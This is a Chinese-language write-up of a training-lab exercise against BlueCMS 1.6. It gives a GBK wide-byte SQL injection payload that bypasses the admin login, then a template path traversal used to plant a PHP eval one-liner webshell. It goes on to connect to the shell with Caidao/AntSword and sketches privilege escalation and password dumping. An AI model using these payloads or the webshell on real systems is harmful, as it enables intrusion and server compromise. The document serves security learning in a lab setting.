封神台之萌新也能找CMS漏洞整理记录
工具
御剑后台扫描工具 ,BurpSuite, 菜刀、蚁剑
信息收集
靶场地址
后台地址
先扫下敏感目录,这是后面才找来的工具,不然时间省下不少,后台是自己猜的,在模版文件路径那里白搞了半天(菜~):
很明显,本站用的是CMS模版,版本:BlueCMS 1.6 ,页脚有显示:
然后网上查相关漏洞,存在SQL注入,这里就不说了,很多。查找过程中发现一个有意思的东西,后台登陆存在宽字节注入,无需账号密码即可登陆后台???
参考下:BlueCMS v1.6 sp1 /admin/login.php SQL注入漏洞分析
进入后台登陆页面
使用任意账号密码登陆抓包,因为不填的话会报错:
- 抓包修改
admin_name
=%df%27+or+1%3D1%23
- 明文就是
%df' or 1=1#
- 单引号被转义后变成
%df\' or 1=1#
- 宽字节注入是利用mysql的一个特性,因为gbk是多字节编码,他认为两个字节代表一个汉字,所以
%df
和后面的\
也就是%5c
变成了一个汉字“運
”,而单引号逃逸了出来,就可以成功闭合sql语句了 - 再加上后面的
or 1=1 #
就构造成了永真语句,可以成功免密登录管理员后台了。
关掉BURP代理,重新刷新后台页面即可成功登陆:
通过后台直接获取SHELL
模版修改处存在越级访问漏洞!当然查到的(万能的网友~)
随意选一个点编辑,打开开发者工具F12,找到内嵌表单地址在新窗口打开
打开后再选一个编辑
然后修改地址
跳到上层目录tpl_name=../../ann.php
并修改模版文件写入PHP一句话木马 <?php @eval($_POST["cmd"]);echo "写入一句话成功!"?>
echo部分只是用来验证是否写入成功,因为是测试,正常渗透应该删除,点击下方提交
回到首页更新缓存!
打开木马文件看一下,写入成功
接下来上菜刀或者蚁剑
连接成功!
使用终端shell
使用whoami看了一下,权限是system,这是因为上一章靶场获取的权限,正常来说,这里应该是普通用户权限,连使用whoami的权限都没有,这里需要提权,至于工具,已经有人上传到服务器了,就在D盘的RECYCLER文件夹下,具体的就不多说了,使用第五章的提权可以创建一个管理员账号远程登陆服务器,再然后呢,可以通过第六章使用一个工具来获取管理员的明文密码,只是到目前为止,我都不知道有没有flag,但是靶场上有且仅有一个人提交了flag,这就很难受了,服务器都拿下了,也没办法。
如果谁有flag麻烦告知一声~谢谢!